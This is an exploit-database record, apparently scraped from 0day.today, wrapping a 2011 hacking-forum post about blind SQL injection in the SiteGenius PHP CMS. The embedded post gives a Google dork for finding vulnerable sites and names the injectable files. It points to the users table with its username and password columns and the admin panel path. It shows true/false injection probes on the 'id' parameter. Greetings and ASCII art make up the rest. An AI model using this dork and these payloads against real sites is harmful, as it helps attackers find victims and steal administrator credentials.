SiteGenius Blind SQL injection Vulnerability

2011-08-02T00:00:00

Description

Exploit for php platform in category web applications

{"id": "1337DAY-ID-16589", "type": "zdt", "bulletinFamily": "exploit", "title": "SiteGenius Blind SQL injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2011-08-02T00:00:00", "modified": "2011-08-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/16589", "reporter": "dR.sqL", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-11T15:03:28", "viewCount": 21, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/16589", "sourceData": "=====================================================\r\nSiteGenius Blind SQL injection vulnerability\r\n=====================================================\r\n \r\n \r\n# Exploit title : SiteGenius Blind SQL injection vulnerability\r\n# Date : 02 \\ 08 \\ 2011\r\n# Author : AutoRUN & dR.sqL\r\n# Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net, HackingWith.US ,\r\n# Software Link : http://www.sitegenius.com\r\n# Tested on : Windows XP & Linux\r\n# Category : web apps\r\n# Google Dork : inurl:\"sitegenius/topic.php?id=\"\r\n# Versions affected : All\r\n \r\n----------------------------------\r\n# ~ ExpL0!taTi0N ~ #\r\n----------------------------------\r\n \r\nAffected files : topic.php & article.php\r\n \r\nSQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php\r\n \r\n \r\nExploit : http://localhost/sitegenius/topic.php?id=1 and 1=1 --> TRUE\r\n http://localhost/sitegenius/topic.php?id=1 and 1=2 --> FALSE\r\n \r\nw00t!! Blind SQL injection !\r\n \r\n \r\n _ _ ____ _ _ _ _ ___ _ ____ _ \r\n / \\ _ _| |_ ___ | _ \\| | | | \\ | | ( _ ) __| | _ \\ ___ __ _| | \r\n / _ \\| | | | __/ _ \\| |_) | | | | \\| | / _ \\/\\ / _` | |_) | / __|/ _` | | \r\n / ___ \\ |_| | |_ (_) | _ <| |_| | |\\ | | (_> < | (_| | _ < _\\__ \\ (_| | |___\r\n /_/ \\_\\__,_|\\__\\___/|_| \\_\\\\___/|_| \\_| \\___/\\/ \\__,_|_| \\_(_)___/\\__, |_____|\r\n |_| \r\n \r\n \r\n \r\n \r\n# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power ,\r\n R-t33n , Ace Wizard, KubaNnez1 , 1Nj3ct0r-4L, AHG , ssgodfather, DJDukli , b4ti , #tupac.al, CroSs HackForums.AL members & All our friends.\r\n \r\n ____ _ ____ ____ _ _ _ _ _\r\n | _ \\ _ __ ___ _ _ __| | |___ \\| __ ) / \\ | | |__ __ _ _ __ (_) __ _ _ __ | |\r\n | |_) | '__/ _ \\| | | |/ _` | __) | _ \\ / _ \\ | | '_ \\ / _` | '_ \\| |/ _` | '_ \\ | |\r\n | __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \\| | |_) | (_| | | | | | (_| | | | | |_|\r\n |_| |_| \\___/ \\__,_|\\__,_| |_____|____/ /_/ \\_\\_|_.__/ \\__,_|_| |_|_|\\__,_|_| |_| (_)\r\n \r\n \r\n# 2011\r\n\r\n\n\n# 0day.today [2018-04-11] #", "_state": {"dependencies": 1647303455, "score": 1659766679, "epss": 1678811959}}